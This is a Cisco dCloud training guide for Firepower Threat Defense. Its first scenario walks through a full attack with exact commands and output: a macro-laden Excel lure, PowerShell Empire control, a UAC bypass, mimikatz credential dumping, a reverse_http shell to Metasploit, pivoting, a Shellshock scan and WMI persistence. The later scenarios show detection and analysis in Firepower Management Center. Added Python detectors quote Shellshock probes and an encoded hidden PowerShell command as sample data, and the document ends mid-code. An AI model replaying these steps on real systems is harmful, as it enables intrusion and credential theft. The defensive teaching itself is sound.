
Cisco dCloud

Firepower Threat Defense v1


Last Updated: 20-OCTOBER-2016

About This Solution


The lab is aimed at technical decision makers, security engineers and CSOs with an interest in security technology. The focus is
not on how to install or configure the system (the Before Phase); we start from a preconfigured system. The focus is instead on
understanding how to work with this system to detect and mitigate an attack (the After Phase).

NOTE: The lab assumes an understanding of techniques used by attackers in the Attack Kill Chain.

The lab does not assume any prior training on Firepower.

About This Lab


This lab includes the following scripted scenarios:

Scenario 1: The Attack. Assume the role of an attacker and perform a realistic attack against the target organization: use phishing
with a malicious Excel file to take control of a client inside the network, then leverage the compromised client to attack other
systems on the inside.

Scenario 2: Getting Started with Firepower Management Center. Become familiar with the Firepower Management Center (FMC)
and its overall structure, including how FMC automatically discovers the network it is protecting: the operating systems, the
applications, the relevant vulnerabilities and the logged-in users. This scenario also walks through a typical NGFW policy, the
ability to create policies that control applications, and how to leverage user identity from Cisco Identity Services Engine (ISE).

Scenario 3: Detection and Analysis. Investigate a reported attack (the one from Scenario 1) using Firepower Management Center,
looking at Indicators of Compromise (IoCs) and correlating events from IPS, Advanced Malware Protection (AMP) and Security
Intelligence to understand the attack and its impact.

Scenario 4: Reporting. Analyze and customize sample reports.

Demonstration Profile and Contact Links


For more information:

View the demonstration content on Cisco dCloud at https://dcloud-cms.cisco.com/?p=23330.

Visit Cisco dCloud Help pages at https://dcloud-cms.cisco.com/help for more information and training materials.

Access all available Cisco dCloud demos at https://dcloud.cisco.com.

© 2016 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 1 of 54

Requirements
The table below outlines the requirements for this preconfigured demonstration.

Table 1. Requirements

Required: Laptop
Optional: Cisco AnyConnect

Topology
This content includes preconfigured users and components to illustrate the scripted scenarios and features of the solution. Most
components are fully configurable with predefined administrative user accounts. You can see the IP address and user account
credentials to use to access a component by clicking the component icon in the Topology menu of your active session and in the
scenario steps that require their use.

Figure 1. dCloud Topology


Figure 2. Lab Topology

Preconfigured User Information

The following information applies to the preconfigured users in this lab:

Evilkali1 and Evilkali2: these are the systems that launch the attacks in Scenario 1.

Workstation A and Workstation B: these are clients inside the target organization. They connect to their network via VPN
(AnyConnect). With this, we illustrate both how Firepower Management Center can obtain user identity from ISE, and how FMC
can automatically put an offending endpoint in quarantine.

The VPN clients have physical IP addresses (198.18.133.x) and virtual IP addresses for VPN (198.19.19.x). The student connects
to the physical IP addresses when accessing these machines, but the addresses seen after VPN termination will be 198.19.19.x.

IoT surveillance camera: this is the ultimate target of the attack in this scenario.

Table 2. Preconfigured User Information

Device         IP Address       User ID               Password

Jumper         198.18.133.135   DCLOUD\administrator  C1sco12345
Evilkali1      198.18.133.110   root                  C1sco12345
Evilkali2      198.18.133.111   root                  C1sco12345
WorkstationA   198.19.30.38     DCLOUD\mordiac        C1sco12345
WorkstationB   198.19.30.37     DCLOUD\scratchy       C1sco12345
fmc            198.19.10.10     dcloud                C1sco12345


Get Started
BEFORE PRESENTING

Cisco dCloud strongly recommends that you perform the tasks in this document with an active session before presenting in front
of a live audience. This will allow you to become familiar with the structure of the document and content.

It may be necessary to schedule a new session after following this guide in order to reset the environment to its original
configuration.

PREPARATION IS KEY TO A SUCCESSFUL PRESENTATION.

Follow the steps to schedule a session of the content and configure your presentation environment.

1. Browse to dcloud.cisco.com, select the location closest to you, and log in with your Cisco.com credentials.

2. (Optional) Register and configure your router if this is the first time you will use the router with dCloud. [Show Me How]

3. Schedule a session. [Show Me How]

4. Test your connection. [Show Me How]

5. Verify that the status of your session is Active in My Dashboard > My Sessions.

NOTE: It may take up to 10 minutes for your session to become active.

6. Click View to open the active session.

7. For best performance, connect to the Jumper with Cisco AnyConnect VPN [Show Me How] and the local RDP client on
your laptop [Show Me How]

Jumper: 198.18.133.135, Username: DCLOUD\Administrator, Password: C1sco12345

NOTE: You can also connect to the workstation using the Cisco dCloud Remote Desktop client [Show Me How]. The dCloud
Remote Desktop client works best for accessing an active session with minimal interaction. However, many users experience
connection and performance issues with this method.

8. On the workstation, open Firefox and connect to the Firepower Management Center at https://fmc.

9. Test connectivity to Workstation A by clicking the icon on the desktop, and click Use another account to log in with
Username: DCLOUD/mordiac and Password: C1sco12345. Click OK.

Figure 3. Workstation Icons and Login


10. Repeat the steps to test connectivity to Workstation B by clicking the icon on the desktop, and click Use another account to
log in, this time with Username: DCLOUD/scratchy and Password: C1sco12345. Click OK.

Figure 4. Workstation Icons and Login

11. From Workstation A, test connectivity to the critical IoT device (which contains incredibly sensitive information) by opening
the Chrome Browser, and navigating to http://iot.dcloud.cisco.com.

12. Open PuTTY to check connectivity to evil1 and evil2.

13. Choose the machine, click Load, and then click Open. Log in using username root and password C1sco12345.


Figure 5. PuTTY Configurations for evil1 and evil2


Scenario 1. The Attack


In this scenario, we assume the role of the attacker and carry out a vicious attack. The attacker has done some research and found
out that:

There are two employees, Scratchy (CFO) and Mordiac (IT admin), who are looking for new jobs (both just updated their
LinkedIn profiles).

There is an internal server iot.dcloud.cisco.com at 198.19.10.211 with some juicy secrets.

Steps
1. From the workstation, open an SSH window and connect to evil2 (198.18.133.111). Log on with root/C1sco12345.

Figure 6. Log in

2. Attempt to reach the internal server iot.dcloud.cisco.com directly from the attacking machine. Scan it with nmap to see if it
has ports 80 or 443 open.
nmap -P0 198.19.10.211 -p 80,443

NOTE: Nmap (https://nmap.org) is a well-known tool among attackers and penetration testers; it does port scanning and much more.

3. The result below shows that the attacker cannot reach the machine directly: note the state filtered, which means the probes
were dropped (typically by a firewall) rather than answered by the host.
root@evilkali2:~# nmap -P0 198.19.10.211 -p 80,443

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-03-17 16:31 GMT


Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 16:31 (0:00:00 remaining)
Nmap scan report for 198.19.10.211
Host is up.
PORT STATE SERVICE
80/tcp filtered http
443/tcp filtered https

4. Since the attacker cannot access the target directly, an attempt will be made to compromise a client computer. The attacker
has prepared a number of Excel files with malicious macros and has tried to make sure they bypass antivirus.


5. On evil2, start Powershell Empire and wait for a naïve end user to open the Excel file.
root@evilkali2:~# cd /opt/Empire
root@evilkali2:/opt/Empire# ./empire

6. The following screen displays.

Figure 7. Empire Log In

NOTE: Powershell Empire is a post-exploitation framework for Windows environments. It uses PowerShell (a scripting language
built into Windows) to do its work, which can be very stealthy and difficult to detect. It is typically used at later stages of the
attack kill chain (privilege escalation, lateral movement, persistence), but in this lab we also use it for the initial exploitation.

7. Use Remote Desktop to access WorkstationA (login with DCLOUD\mordiac and password C1sco12345).


8. Verify that the AnyConnect VPN session is established by clicking the arrow in the bottom right corner, then clicking the
AnyConnect icon. If you are not connected, press the Connect button.

Figure 8. Any Connect

9. On Workstation A, open the Firefox browser. The homepage displays.

10. Click Download files.

Figure 9. Firefox on Workstation


11. This displays a number of Excel files to download. Click the link Catjob2.xls and try to download it. The download will fail,
as this type of known malware can be stopped immediately.

Figure 10. Excel Files

12. Click Job-Obscene-Salary.xls. This file is a zero day, carefully coded to bypass defenses.

13. Save the file to the Desktop.


Figure 11. Job_Obscene-Salary

14. Double-click the downloaded Excel file from the desktop.

NOTE: You may be prompted to Enable Editing and Enable Content. These are security measures designed to discourage end
users from running macros. However, using social engineering it is often possible to get past this defense.

NOTE: Do NOT quit the Excel application until after this lab.


Figure 12. Enable Editing

Figure 13. Enable Content

15. Return to the SSH console on evilkali2. The screen should now indicate that Powershell Empire has got its first client.


Figure 14. Powershell Empire

16. That shows that the Excel file was malicious. Check whether any of the AV vendors on VirusTotal would have picked it up.

17. From WorkstationA, open a tab in the browser and navigate to http://virustotal.com to submit the file.

Figure 15. Virus Total Scan


18. Submit the newly downloaded file. Your output should look like the one below. Most likely, very few (if any) AV vendors
detected the file as malicious.

Figure 16. Virus Total

19. On your Evilkali2 SSH console with Empire, go to agents mode and watch your agent. The name is random.
(Empire) > agents
[*] Active agents:
Name              Internal IP    Machine Name  Username        Process          Delay  Last Seen
----------------  -------------  ------------  --------------  ---------------  -----  -------------------
XZ1D4KMFFBS2CPC1  198.19.30.38   WORKSTATIONA  DCLOUD\mordiac  powershell/2936  5/0.0  2016-03-17 18:16:56

(Empire: agents) >

20. Change the name to something shorter, for example, the letter A.

NOTE: Use <tab> to complete command so you only have to type the first letter of the Agent Name.
(Empire: agents) > rename <name of agent as per above> A

21. Interact with your agent by typing interact <Name>.

NOTE: You can use <tab> and only type Interact plus the first letter of the agent (in picture above that would be interact X + tab).
(Empire: agents) > interact A
(Empire: A) >


22. Verify that we can now control the machine: change directory, list files, steal files, upload files.

(Empire: A) > cd C:\Users\Mordiac\Desktop


(Empire: A) > pwd
(Empire: A) >
Path
C:\Users\Mordiac\Desktop
(Empire: A) > dir
(Empire: A) >
LastWriteTime length Name
------------- ------ ----
3/28/2016 3:44:34 PM Tools
3/7/2016 8:47:14 PM 282 desktop.ini
3/28/2016 7:09:52 PM 52224 Job-Obscene-Salary.xls
3/12/2016 1:47:22 PM 0 MORDIAC-A.txt
(Empire: A) > download MORDIAC-A.txt
(Empire: A) >
[*] File download of C:\Users\Mordiac\Desktop\MORDIAC-A.txt completed

23. Empire has many different modules (written in PowerShell), some of which we will use during this lab. To show the control we
have right now, use the module trollsploit/message. Once in a module you can see its configurable parameters by typing info.
(Empire: A) > usemodule trollsploit/message
(Empire: trollsploit/message) > info

Options:
Name     Required  Value                                     Description
----     --------  -----                                     -----------
MsgText  True      Lost contact with the Domain Controller.  Message text to display.

Then run the module by typing run.

(Empire: trollsploit/message) > run


[>] Module is not opsec safe, run? [y/N] y
(Empire: trollsploit/message) >
Job started: Debug32_pfefb

24. On WorkstationA, observe the message box.

NOTE: This is not very stealthy, so a real attacker would not do this without a good reason (such as showing a message box that
prompts for username and password in order to gather credentials).

Figure 17. Lost Contact Message Box


25. Next the attacker wants to elevate privileges to SYSTEM. This is very easy here since Mordiac was (foolishly) logged in as
administrator, so all that is needed is to bypass Microsoft UAC (User Account Control); see
http://www.powershellempire.com/?page_id=380.

26. From evilkali2, type back to return to interacting with A, then bypassuac test (test is the name of the listener) and answer yes
to the warning that the module is not opsec safe (meaning it touches the hard disk, leaving traces that AV or defensive tools could
detect).

(Empire: trollsploit/message) > back


(Empire: A) >
(Empire: A) > bypassuac test
[>] Module is not opsec safe, run? [y/N] y
(Empire: A) >

27. The output displays (the name of the agent will vary), meaning you now have a new agent connection, but with higher
privileges.

Figure 18. Output

28. Interact with the new session, with system privileges.

29. Enter agents and note which session has an asterisk (*) in the username column.
(Empire: A) > agents
[*] Active agents:
Name              Internal IP    Machine Name  Username         Process          Delay  Last Seen
----------------  -------------  ------------  ---------------  ---------------  -----  -------------------
A                 198.18.133.38  WORKSTATIONA  DCLOUD\mordiac   powershell/3484  5/0.0  2016-03-28 19:28:26
MZK3MLW4PGPFZNU1  198.18.133.38  WORKSTATIONA  *DCLOUD\mordiac  powershell/2228  5/0.0  2016-03-28 19:28:26

30. Rename the session with an asterisk to (for example) AA and interact with it.

NOTE: Remember you only need to type the first character(s) of agent name and then TAB.
(Empire: agents) > rename MZK3MLW4PGPFZNU1 AA
(Empire: agents) > interact AA
(Empire: AA) >

31. The attacker now has a session with SYSTEM privileges, which gives the attacker all privileges on the local machine,
including modifying system files and dumping password hashes.


32. Enter mimikatz to see what credentials can be recovered from the machine.

(Empire: AA) > mimikatz

33. The output will look similar to the one below; if you scroll up, you will see passwords and password hashes.

Figure 19. Output

NOTE: Remember the attacker's objective: to break into the IoT device iot.dcloud.cisco.com at 198.19.10.211. In order to do so
he may need to add new tools to the toolbox.

NOTE: We are now going to hand control of the compromised client to a second attack framework as well: Metasploit. Whilst
Powershell Empire allows for very easy and stealthy post exploitation in a Windows environment using the PowerShell scripting
language, Metasploit can be used to attack any system regardless of operating system.

34. Keep the SSH window to evil2 open, but start a new SSH session to evil2 (198.18.133.111) and log on with
root/C1sco12345.

35. Start the Metasploit console (msfconsole) with the resource script file multi.rc.
root@evilkali2:~# msfconsole -r multi.rc

36. The following displays.


Figure 20. Command Output

NOTE: We now have two SSH sessions to evil2. In the first we are running Powershell Empire, a formidable post-exploitation
framework for Windows environments. But in order to attack the Linux-based IoT device we want to create an alternative control
channel to the Metasploit framework (our second SSH session).

37. From the first SSH session with Empire, while interacting with the session that has SYSTEM privileges, enter the following
commands. This creates an outgoing HTTP command-and-control session to your Metasploit listener.
(Empire: AA) > usemodule code_execution/invoke_shellcode
(Empire: code_execution/invoke_shellcode) > set Listener Meterpreter
(Empire: code_execution/invoke_shellcode) > set Payload reverse_http
(Empire: code_execution/invoke_shellcode) > run

38. Now watch your second SSH session (the one with Metasploit listening). The output should look similar to the one below,
indicating that we now control the compromised client from the Metasploit framework.

Figure 21. Second SSH Session Output

39. In the second SSH session (with metasploit), create a route to allow the Metasploit framework to attack targets on the inside of
the network via the compromised client using meterpreter session 1.

NOTE: The syntax is route add <network> <mask> <session>.


meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > route add 198.19.10.0 255.255.255.0 1


Figure 22. Metasploit Framework

NOTE: Note how the attack now goes via the compromised client, even though the IoT device is not reachable directly.


40. Finally, attack the IoT device using the previous meterpreter session.

41. From the second SSH window (with the meterpreter session), invoke the Metasploit resource script iot2.rc, which sets up a
scan for the Bash Shellshock vulnerability (CVE-2014-6271). Even though this vulnerability dates from September 2014, the
attacker has some hope because IoT systems are often not patched regularly.
msf exploit(handler) > resource iot2.rc
[*] Processing iot2.rc for ERB directives.
resource (iot2.rc)> use auxiliary/scanner/http/apache_mod_cgi_bash_env
resource (iot2.rc)> set targeturi /cgi-bin/vulnerable.cgi
targeturi => /cgi-bin/vulnerable.cgi

42. Run the exploit.


msf auxiliary(apache_mod_cgi_bash_env) > exploit

NOTE: If successful, the exploit will execute the Unix id command on the server, proving that it is possible to execute arbitrary
commands on the IoT server (in the context of the www user).

In this case, however, it is not working (no user info is returned), as shown below. The reason for that (an IPS block) will become
clear in Scenario 3.

Figure 23. Run the Exploit
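The IPS block referred to above is, at its core, a content match: a CGI server copies request headers into environment variables, and a Bash build affected by CVE-2014-6271 treats a variable whose value starts with "() {" as a function definition and keeps executing whatever follows the closing brace. The following is an added example, not part of the dCloud guide and not Cisco's Snort rule, that scans constructed HTTP requests for that marker the way a simple IPS signature would; the host name iot.example.test and all sample requests are constructed for the example.

```python
"""Detect Shellshock-style (CVE-2014-6271) probes in HTTP request headers."""
import re
from typing import Dict, List, Tuple

# The Bash function-definition marker that the vulnerability keys on.
# Any header reaches the CGI environment, so every header is scanned,
# not only User-Agent (the one most often used for the probe).
SHELLSHOCK_MARKER = re.compile(r"\(\)\s*\{")


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP request into its request line and a header dict."""
    lines = raw.strip().splitlines()
    request_line = lines[0]
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break  # end of headers; the body is irrelevant for this check
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def find_shellshock_headers(headers: Dict[str, str]) -> List[str]:
    """Return the (sorted) names of headers carrying the "() {" marker."""
    return sorted(name for name, value in headers.items()
                  if SHELLSHOCK_MARKER.search(value))


def scan_requests(raw_requests: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (request_line, offending_headers) for each suspicious request."""
    findings = []
    for raw in raw_requests:
        request_line, headers = parse_request(raw)
        hits = find_shellshock_headers(headers)
        if hits:
            findings.append((request_line, hits))
    return findings


# Constructed sample traffic (not captured from the lab environment).
SAMPLE_REQUESTS = [
    # A normal browser request to the same CGI path.
    "GET /cgi-bin/vulnerable.cgi HTTP/1.1\nHost: iot.example.test\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\n\n",
    # The classic probe: marker in User-Agent, followed by the id command.
    "GET /cgi-bin/vulnerable.cgi HTTP/1.1\nHost: iot.example.test\n"
    "User-Agent: () { :; }; /usr/bin/id\n\n",
    # Same marker hidden in a less obvious header, with a harmless cookie.
    "GET /index.html HTTP/1.1\nHost: iot.example.test\n"
    "Cookie: session=abc123; theme=dark\n"
    "Referer: () {:;}; echo probe\n\n",
]

if __name__ == "__main__":
    for request_line, hits in scan_requests(SAMPLE_REQUESTS):
        print(f"{request_line}: Shellshock marker in {', '.join(hits)}")
```

The check is deliberately broad (it matches the marker, not a specific command), which is the trade-off a real IPS signature makes too: a benign request almost never contains "() {" in a header, so the false-positive cost of the wide net is low, and it catches variants regardless of what follows the braces.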

43. A reasonable next step for the attacker is to gain persistence, meaning creating a backdoor that survives a reboot, preferably
(from the attacker's perspective) one that is not caught by any antivirus. Powershell Empire (our first SSH session) will achieve
this goal.

44. On our first SSH session with Powershell Empire, use the module persistence/elevated/wmi.
(Empire: AA) > usemodule persistence/elevated/wmi
(Empire: persistence/elevated/wmi) > set Listener test
(Empire: persistence/elevated/wmi) > run
[>] Module is not opsec safe, run? [y/N] y
(Empire: persistence/elevated/wmi) >
WMI persistence established using listener test with OnStartup WMI subsubscription trigger.
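A permanent WMI event subscription, as established above, leaves three objects in the root\subscription namespace: an __EventFilter (the trigger), an event consumer (the action) and a __FilterToConsumerBinding joining them. Sysmon records their creation as events 19, 20 and 21, which gives a defender something to correlate. The following is an added example, not part of the dCloud guide and not a Cisco or Sysinternals tool, that joins constructed Sysmon-style records into subscriptions and flags those combining a boot-time trigger with a process-launching consumer; the field names follow Sysmon's (Name, Query, Type, Destination, Consumer, Filter) and the sample records, including the subscription named Updater and its command line, are constructed.

```python
"""Surface permanent WMI event subscriptions that look like boot-time
persistence, by correlating Sysmon events 19, 20 and 21."""
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style records (not exported from the lab workstation).
# Sysmon logs a new __EventFilter as event 19, a new consumer as event 20
# and the __FilterToConsumerBinding that joins them as event 21.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "19", "Name": "Updater", "EventNamespace": "root\\cimv2",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE "
              "TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' "
              "AND TargetInstance.SystemUpTime >= 240 "
              "AND TargetInstance.SystemUpTime < 325"},
    {"EventID": "20", "Name": "Updater", "Type": "Command Line",
     "Destination": "powershell.exe -NoP -NonI -W Hidden -Enc SQBFAFgAIAAo..."},
    {"EventID": "21", "Consumer": 'CommandLineEventConsumer.Name="Updater"',
     "Filter": '__EventFilter.Name="Updater"'},
    # The stock Windows SCM event-log subscription, for contrast.
    {"EventID": "19", "Name": "SCM Event Log Filter", "EventNamespace": "root\\cimv2",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": "20", "Name": "SCM Event Log Consumer", "Type": "Other",
     "Destination": "NTEventLogEventConsumer"},
    {"EventID": "21", "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '__EventFilter.Name="SCM Event Log Filter"'},
]

# A filter that fires shortly after boot: an uptime window polled on
# Win32_PerfFormattedData_PerfOS_System, or a shutdown event.
BOOT_TRIGGER = re.compile(r"PerfOS_System.*SystemUpTime|Win32_ComputerShutdownEvent",
                          re.IGNORECASE)
# Command lines that legitimate management software rarely registers.
SUSPICIOUS_CMD = re.compile(
    r"powershell.*(-enc\b|-w\s+hidden|-nop\b)|\b(wscript|cscript|mshta)\b",
    re.IGNORECASE)
NAME_IN_PATH = re.compile(r'\.Name="([^"]+)"')


def _name(path: str) -> str:
    """Extract Name from a WMI object path such as __EventFilter.Name="X"."""
    m = NAME_IN_PATH.search(path)
    return m.group(1) if m else path


def build_subscriptions(events: List[Dict[str, str]]) -> List[Tuple[Dict, Dict]]:
    """Join each binding (21) to its filter (19) and consumer (20) record."""
    filters = {e["Name"]: e for e in events if e["EventID"] == "19"}
    consumers = {e["Name"]: e for e in events if e["EventID"] == "20"}
    pairs = []
    for e in events:
        if e["EventID"] != "21":
            continue
        flt = filters.get(_name(e["Filter"]))
        con = consumers.get(_name(e["Consumer"]))
        if flt and con:
            pairs.append((flt, con))
    return pairs


def reasons_for(flt: Dict[str, str], con: Dict[str, str]) -> List[str]:
    """Independent indicators that a subscription is persistence rather than management."""
    reasons = []
    if BOOT_TRIGGER.search(flt["Query"]):
        reasons.append("filter fires on a boot-time trigger")
    if con["Type"] == "Command Line":
        reasons.append("consumer launches a process (CommandLineEventConsumer)")
    if SUSPICIOUS_CMD.search(con["Destination"]):
        reasons.append("hidden/encoded PowerShell command line")
    return reasons


def find_suspicious(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (filter name, reasons) for subscriptions with at least two
    indicators; requiring two keeps single benign traits from alerting."""
    hits = []
    for flt, con in build_subscriptions(events):
        reasons = reasons_for(flt, con)
        if len(reasons) >= 2:
            hits.append((flt["Name"], reasons))
    return hits


if __name__ == "__main__":
    for name, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"{name}: " + "; ".join(reasons))
```

Without Sysmon, the same three object classes can be enumerated on a live host with PowerShell's Get-WmiObject against the root\subscription namespace (classes __EventFilter, __EventConsumer and __FilterToConsumerBinding) and fed through the same correlation.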


45. Reboot WorkstationA by typing the following command in the Windows start window.

shutdown -t 0 -r

NOTE: Be careful typing this. Do not forget -r, or the system will just shut down and not restart.

Figure 24. Reboot Workstation

46. Wait 1-2 minutes and then login with remote desktop.

47. In 5 minutes, you will have a new connection from the machine.

Conclusion

This concludes the first scenario. To summarize what has happened:

The attacker wanted to attack the internal IoT server to control the video camera.

The attacker tried to attack the IoT server directly but it seemed to be blocked by the firewall.

The attacker then launched a phishing attack against a naïve user on the inside, using a zero-day malware package as an
Excel macro, taking control of the machine on the inside.

The attacker escalated privileges to that of system, and could dump usernames/passwords on the machine.

The attacker established persistence, so he will remain in the network even after a reboot.

The attacker then decided to go after the IoT server using the Bash Shellshock attack. This attack may have failed: maybe an
IPS blocked it, or the server was patched. You will find out in Scenario 3.

The attacker is still in the network and will seek new ways to attack. One of them may be successful.

This is now a race against time.


Scenario 2. Getting Started with Firepower Management Center


In this scenario, we will log in to FMC and become familiar with the GUI. We will look at:

Context Explorer, which shows what Firepower learns about the network it is protecting: the hosts, their operating systems, the
applications, the vulnerabilities and the logged-in users

How Firepower's knowledge about the network it is protecting can be used to automatically tune IPS rules

The NGFW ruleset

How FMC can get identity information from ISE or Active Directory

Device configuration: NAT, interfaces and routing

Steps
1. From the Workstation, open the Firefox browser and log on to the FMC (https://fmc), using username dcloud and password
C1sco12345.

2. Select Analysis/Context Explorer and adjust the time period to the last day.

Figure 25. Adjust Time of Day

NOTE: Some of the sections may take a long time to load in this virtual setup. The reason for this is being investigated.


3. A key feature of Firepower Management Center (FMC) is that it keeps track of the operating systems and applications used by
each host on the internal network, as well as the logged-in users and vulnerabilities. Scroll down to the Network Information
section. As you can see, FMC has discovered different operating systems.

Figure 26. Context Explorer

Figure 27. Context Explorer


4. Scroll down to Application Protocol Information to examine what applications have been discovered.

NOTE: You can click any slice of a pie chart, or any bar in a bar chart, to filter further or drill down into analysis (jumping to
events). For hosts (IP addresses) it is also possible to view the host profile. Navigate to Network Information, find 198.19.19.38
(workstation-A) and select View Host Information.

Figure 28. Network Information

Figure 29. Host Profile


5. Look at the Host Information. This section displays logged in users, Indicators of Compromise, Operating systems,
Applications, and Vulnerabilities for that particular host.


6. Scroll down to examine the Applications Discovered on the host.

NOTE: Note the exclamation mark (!) to the left of certain applications. It means Firepower has detected a new application that is
not in the configured whitelist. This whitelist (which can be learned by inspecting traffic to and from a host) can be used to detect
when something changes in the network (such as a new application). This can be very useful in static environments (medical
technical networks, SCADA, some DMZs, etc.).

Figure 30. New Applications with Exclamation Point

7. Scroll down to examine the potential vulnerabilities tracked on this host.


Figure 31. Vulnerabilities

NOTE: The knowledge FMC has gained of the network (the hosts, the operating systems, the applications and the vulnerabilities)
can be used to automatically fine-tune the IPS policies.

8. Select Policy -> Access Control -> Intrusion and edit the dCloud-IPS policy by clicking the pencil symbol.

Figure 32. Edit the dCloud-IPS Policy

9. Firepower recommends changes to the IPS configuration based on its knowledge of the network. Click View Recommended
Changes below to see what changes are recommended.


Figure 33. Edit Policy Recommendations


10. There are more than 2100 IPS signatures that Firepower recommends you change (based on its knowledge of the network).
The advantages of tuning the IPS ruleset are better performance and a reduced risk of false positives.

Figure 34. IPS Signatures

11. Do not apply the Firepower recommendations.

12. To look at NGFW policies, select Policies->Access Control -> Access Control and click the pen symbol.

Figure 35. Access Control Policies


13. Examine the different options for the NGFW policy. It is possible to have different rules depending on Active Directory Group,
Application, URL category but also attributes from Cisco ISE. For each rule, it is possible to define different IPS policies or
policies for AMP and logging.

Figure 36. Policy Options

14. Try adding a new rule (or edit an existing rule) to examine the options for applications, URLs, Users and ISE attributes. You do
not have to create the rule and can cancel out after investigating what options are available.

Figure 37. User options (Active Directory Groups)


Figure 38. ISE User Attributes

Figure 39. Application Choices


15. Examine the SSL decryption policies. Select Policies->Access->SSL and edit the Dcloud-SSL Policy.

NOTE: In many cases it may be desirable to control when to decrypt SSL, for reasons of policy (law and compliance) or
performance.

It is possible to decrypt or not decrypt based on a number of criteria such as source IP address, destination IP address, user
identity (e.g. do not decrypt HR traffic), destination URL category (e.g. do not decrypt finance) and so on.

Figure 40. dCloud-SSL Policy

16. On WorkstationA, test the decryption policy by trying to download a malicious file again over https:// from WorkstationA
using Internet Explorer.

17. Navigate to https://www.evilchi.com/Catjob3.xls. This download will not succeed, since Advanced Malware Protection
(AMP) will block this file.

Figure 41. Download Blocked


18. Examine Device configuration. Select Devices->Device Management and edit the device vFTD.

Figure 42. Device Management

19. Examine the configuration options.

NOTE: With Firepower Threat Defense (FTD) software, FMC can configure all features such as NAT, routing (static routes, BGP,
OSPF), DHCP server settings, etc. Please feel free to investigate the different options, but please avoid making changes.

Figure 43. Configuration Options


Scenario 3. Detection and Analysis


In this scenario we focus on the detection and analysis capabilities of Firepower, using the attack in Scenario 1 as an example.

Firepower makes it easy to identify compromised hosts by collecting Indicators of Compromise (IoCs) per host. An IoC is a
reasonable suspicion that a host may be compromised and under the control of somebody else. It is also possible to quickly
understand the context of the host: operating system, running applications, vulnerabilities, malware, logged-in users, and
connections to and from this host.

Steps
1. From the workstation, log in to the Firepower Management Center with Firefox, using https://198.18.133.10 with Username:
dcloud and password: C1sco12345.

2. Select Analysis -> Context Explorer. This is a good starting point for the security analyst.

NOTE: Look at the Indicators of Compromise (IoCs). One host (198.19.19.38) has experienced many IoCs.

Figure 44. Indications of Compromise

NOTE: FMC collects the Indicators of Compromise (IoCs) per host, making it easy for the security analyst to identify the hosts that
need attention now.


3. The host 198.19.19.38 has a couple of Indicators of Compromise. Have a further look at this host by right-clicking the blue
bar in the Indications by Host section and choosing View Host Information.

Figure 45.

4. The Host Information View should open in a different window (see below).


Figure 46. Host Information

NOTE: Learn more about the machine that may have been compromised.

FMC offers you contextual information about a potentially compromised machine, such as:

What user is logged in to the machine now?

What users have been logged in to the machine?

What operating system is it? (Windows, Linux)

What applications have been observed?

What vulnerabilities could this machine have?

What indicators of compromise have been seen on this machine?

What connection events (firewall L3/L4 connections) relate to this machine?

What file events (files uploaded or downloaded) relate to this machine?

What malware events (files that are malware) relate to this machine?

What IPS events relate to this machine?

5. From Host Profile, check what users have been logged on to the machine.


Figure 47. Host Profile

NOTE: Quiz yourself: why is it important to understand that mordiac has been logged on to the machine?

Mordiac may be the future President.

Mordiac is a CFO, so he has access to critical financial reports that could be secret.

Mordiac is a domain admin, so compromising his credentials with a tool like mimikatz would put all the credentials in the whole
organization in jeopardy (including the CFO's and any future President's).

6. From the Host Profile, check what operating system the compromised machine is running.

Figure 48. Operating Systems

7. The Host Profile shows Indicators of Compromise. Check what Malware events are associated with this host.


Figure 49. Malware Summary

Figure 50. Host Profile

8. Click the red wheel icon to view the Network File Trajectory for this file.

Figure 51. Red Wheel Symbol

9. Inspect the Network File Trajectory.

NOTE: The file was allowed at first: it was zero-day malware, so its disposition was still unknown when it crossed the network.


Figure 52. Network File Trajectory

NOTE: Firepower AMP records every file transfer, regardless of the disposition assumed at the time (unknown, clean or malware), and
can change its verdict later and tell you about it. This is called retrospection.


10. Examine the Threat Score (Dynamic Analysis, or Sandboxing Result). In this case the file was convicted (deemed
malicious) because of Dynamic Analysis (sandboxing). You can get details of the dynamic analysis by clicking
the Threat Score symbol:

Figure 53. Threat Score

Figure 54. Dynamic Analysis Summary

NOTE: The Dynamic Analysis Summary shows some clear indicators of why this file (which was not caught by any AV at the time) is
clearly malicious:

Office documents should not launch PowerShell!

Office documents should not open network connections!

PowerShell with encoded commands..??

DNS queries for non-existent domains are suspicious indeed!

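The four indicators above are the kind of behavioural evidence a sandbox report turns into a threat score. The following added example (not Cisco or Threat Grid code) runs that scoring over a constructed list of sandbox events modelled on the lab's summary: an Office process spawning PowerShell with an -EncodedCommand argument, the Office process opening a network connection, and a burst of NXDOMAIN responses. The event format, the weights and the download host 198.19.19.1 inside the payload are assumptions made for this illustration.

```python
import base64
import re
from collections import Counter

OFFICE_APPS = {"EXCEL.EXE", "WINWORD.EXE", "POWERPNT.EXE"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the value is base64 of UTF-16LE text.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encod|encodedcommand)\s+([A-Za-z0-9+/=]+)")
NXDOMAIN_THRESHOLD = 3

# Weight per indicator; the total is capped at 100 like a threat score. Weights are assumed.
WEIGHTS = {
    "office_spawns_shell": 40,
    "encoded_powershell": 30,
    "office_network": 20,
    "nxdomain_burst": 20,
}

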